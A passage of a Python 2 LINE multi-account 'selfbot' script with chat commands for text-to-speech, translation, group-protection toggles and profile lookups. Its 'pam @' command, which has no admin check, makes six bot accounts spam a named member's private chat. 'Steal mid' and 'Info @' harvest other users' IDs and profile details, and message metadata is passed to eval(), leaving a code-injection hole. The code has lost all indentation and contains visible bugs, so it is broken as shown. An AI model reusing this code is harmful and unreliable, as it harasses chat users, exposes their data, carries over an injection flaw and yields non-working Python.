cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-fr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-fr ","")
tts = gTTS(psn, lang='fr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-de " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-de ","")
tts = gTTS(psn, lang='de', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-el " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-el ","")
tts = gTTS(psn, lang='el', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hi " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hi ","")
tts = gTTS(psn, lang='hi', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hu " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hu ","")
tts = gTTS(psn, lang='hu', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-is " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-is ","")
tts = gTTS(psn, lang='is', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-id " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-id ","")
tts = gTTS(psn, lang='id', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-it " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-it ","")
tts = gTTS(psn, lang='it', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-jp " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-jp ","")
tts = gTTS(psn, lang='ja', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-km " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-km ","")
tts = gTTS(psn, lang='km', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ko " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ko ","")
tts = gTTS(psn, lang='ko', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-la " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-la ","")
tts = gTTS(psn, lang='la', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-lv " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-lv ","")
tts = gTTS(psn, lang='lv', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-mk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-mk ","")
tts = gTTS(psn, lang='mk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-no " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-no ","")
tts = gTTS(psn, lang='no', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-pl " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-pl ","")
tts = gTTS(psn, lang='pl', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-pt " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-pt ","")
tts = gTTS(psn, lang='pt', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ro " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ro ","")
tts = gTTS(psn, lang='ro', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ru " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ru ","")
tts = gTTS(psn, lang='ru', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sr ","")
tts = gTTS(psn, lang='sr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-si " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-si ","")
tts = gTTS(psn, lang='si', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sk ","")
tts = gTTS(psn, lang='sk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-es " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-es ","")
tts = gTTS(psn, lang='es', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-eses " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-eses ","")
tts = gTTS(psn, lang='es-es', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-esus " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-esus ","")
tts = gTTS(psn, lang='es-us', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sw " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sv ","")
tts = gTTS(psn, lang='sv', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ta " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ta ","")
tts = gTTS(psn, lang='ta', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-th " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-th ","")
tts = gTTS(psn, lang='th', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-tr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-tr ","")
tts = gTTS(psn, lang='tr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-uk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-uk ","")
tts = gTTS(psn, lang='uk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-vi " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-vi ","")
tts = gTTS(psn, lang='vi', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-cy " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-cy ","")
tts = gTTS(psn, lang='cy', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
#=======================================================
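# Self-profile info commands: report the primary bot's display name, bio, profile picture, and cover URL.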
elif msg.text in ["Myname"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = cl.getContact(mid)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
h = cl.getContact(mid)
cl.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Urlpict"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Mycover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendText(msg.to, path)
#=======================================================
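# Translation commands: "Translate-<lang> <text>" passes the text through the Translator client (googletrans-style API) and replies with the result.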
elif "Translate-arab " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-arab ","")
try:
translator = Translator()
trs = translator.translate(txt,'ar')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-korea " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-korea ","")
try:
translator = Translator()
trs = translator.translate(txt,'ko')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-chin " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-chin ","")
try:
translator = Translator()
trs = translator.translate(txt,'zh-cn')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-japan ","")
try:
translator = Translator()
trs = translator.translate(txt,'ja')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-thai " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-thai ","")
try:
translator = Translator()
trs = translator.translate(txt,'th')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-idn " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-idn ","")
try:
translator = Translator()
trs = translator.translate(txt,'id')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-eng ","")
try:
translator = Translator()
trs = translator.translate(txt,'en')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ks.sendText(msg.to,(bctxt))
kt.sendText(msg.to,(bctxt))
#======================================
elif "TL:" in msg.text:
if msg.from_ in admin:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#=================================================================
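# Feature toggles: the commands below flip flags in the wait dict (protection level, QR block, auto reinvite, welcome message, etc.) and confirm with a timestamp.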
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
#≠≠================≠==================≠====≠===========!=======!==!
elif msg.text in ["Auto reinvite:off","auto reinvite:off"]:
if msg.from_ in admin:
if wait["autorein"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["autorein"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto reinvite:on","auto reinvite:on"]:
if msg.from_ in admin:
if wait["autorein"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already on\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to ,"Already on\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["autorein"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already on\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on\n"+ datetime.today().strftime('%H:%M:%S'))
##≠========================&=&==&=&=%=%=%=%==%=%=%=%;%;%;;%;;%;%
elif msg.text in ["Welcome message:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Welcome message:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
else:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#================================================================
elif msg.text in ["Shows offenders:on"]:
if msg.from_ in admin:
if wait["pelaku"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable ")
else:
wait["pelaku"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable ")
elif msg.text in ["Shows offenders:off"]:
if msg.from_ in admin:
if wait["pelaku"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable ")
else:
wait["pelaku"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable")
elif msg.text in ["Invite user"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Mc:" in msg.text:
if msg.from_ in admin:
mmid = msg.text.replace("Mc:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#==========≠===============================
elif msg.text in ["Tag on"]:
if wait["tag"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already set to on")
else:
cl.sendText(msg.to,"Tag On")
else:
wait["tag"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag On")
else:
cl.sendText(msg.to,"already set to on")
elif msg.text in ["Tag off"]:
if wait["tag"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already set to off")
else:
cl.sendText(msg.to,"Tag Off")
else:
wait["tag"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag Off")
else:
cl.sendText(msg.to,"Already set to off")
#=======================================================
elif msg.text in ["Auto notice:on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
#=========================================================================
elif msg.text in ["Auto notice:off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
elif msg.text in ["Auto join:on"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"")
else:
cl.sendText(msg.to,"already activated")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"enable auto koin")
else:
cl.sendText(msg.to,"")
elif msg.text in ["Auto join:off"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
wait["autoCancel"]["members"] = num
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Auto leave:on"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["Auto leave:off"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
#===============================================================
elif msg.text in ["Auto like:on"]:
if msg.from_ in admin:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Auto like:off"]:
if msg.from_ in admin:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
#==========================================================
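# "Set" prints a summary of the current toggle states from the wait/mimic dicts.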
elif msg.text in ["Set"]:
if msg.from_ in admin:
print "Setting pick up..."
md="list of bot settings\n\n"
if wait["likeOn"] == True: md+="Auto like : on\n"
else:md+="Auto like : off\n"
if mimic["copy"] == True: md+="Mimic : on\n"
else:md+="Mimic : off\n"
if wait["winvite"] == True: md+="Invite : on\n"
else:md+="Invite : off\n"
if wait["pname"] == True: md+="Namelock : on\n"
else:md+="Namelock : off\n"
if wait["contact"] == True: md+="Notice : on\n"
else: md+="Notice : off\n"
if wait["autoJoin"] == True: md+="Auto join : on\n"
else: md +="Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+="Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "Group cancel : off\n"
if wait["leaveRoom"] == True: md+="Auto leave : on\n"
else: md+="Auto leave : off\n"
if wait["clock"] == True: md+="Clock Name : on\n"
else:md+="Clock Name : off\n"
if wait["autoAdd"] == True: md+="Auto add : on\n"
else:md+="Auto add : off\n"
if wait["commentOn"] == True: md+="Comment : on\n"
else:md+="Comment : off\n"
if wait["Backup"] == True: md+="Backup : on\n"
else:md+="Backup : off\n"
if wait["qr"] == True: md+="Protect QR : on\n"
else:md+="Protect QR : off\n"
if wait["welcomemsg"] == True: md+="welcome message : on\n"
else:md+="welcome message : off\n"
if wait["protectionOn"] == True: md+="Protection : hight\n\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="Protection : low\n\n"+ datetime.today().strftime('%H:%M:%S')
if wait["autorein"] == True: md+="auto reinvite : on\n"
else:md+="auto reinvite : off\n"
if wait["pelaku"] == True: md+="shows offender : on\n"
else:md+="shows offender : off\n"
if wait["tag"] == True: md+"Notag : on\n"
else:md+="Notag : off\n"
cl.sendText(msg.to,md)
#========================================
#------------------------------------------------
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["PING","Ping","ping"]:
if msg.from_ in admin:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
kk.sendText(msg.to,"PONG double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
ks.sendText(msg.to,"PONG double thumbs upHar Har")
kt.sendText(msg.to,"PONG double thumbs upHar Har")
cl.sendText(msg.to,"PONG double thumbs upHar Har")
elif "Info @" in msg.text:
if msg.from_ in admin:
nama = msg.text.replace("Info @","")
target = nama.rstrip(' ')
tob = cl.getGroup(msg.to)
for g in tob.members:
if target == g.displayName:
gjh= cl.getContact(g.mid)
try:
cover = cl.channel.getCover(g.mid)
except:
cover = ""
cl.sendText(msg.to,"[Display Name]:\n" + gjh.displayName + "\n[Mid]:\n" + gjh.mid + "\n[BIO]:\n" + gjh.statusMessage + "\n[pict profile]:\nhttp://dl.profile.line-cdn.net/" + gjh.pictureStatus + "\n[Cover]:\n" + str(cover))
else:
pass
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Auto add:on"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"success activated")
else:
cl.sendText(msg.to,"success activated")
elif msg.text in ["Auto add:off"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"success unactivated")
else:
cl.sendText(msg.to,"success unactivated")
#========================================
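# "pam @<name>": every bot sends a "Spammed" message directly to the mentioned member's personal chat.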
elif "pam @" in msg.text:
_name = msg.text.replace("pam @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Spammed")
ki.sendText(g.mid,"Spammed")
kc.sendText(g.mid,"Spammed")
ks.sendText(g.mid,"Spammed")
kk.sendText(g.mid,"Spammed")
kt.sendText(g.mid,"Spammed")
ct.sendText(msg.to,"done spam bossque")
#========================================
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif "Message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Message:","")
cl.sendText(msg.to,"bot message\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Add message:" in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Add message:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"done。\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["Comment:on"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Comment:off"]:
if msg.from_ in admin:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Check comment"]:
if msg.from_ in admin:
cl.sendText(msg.to,"message comment\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
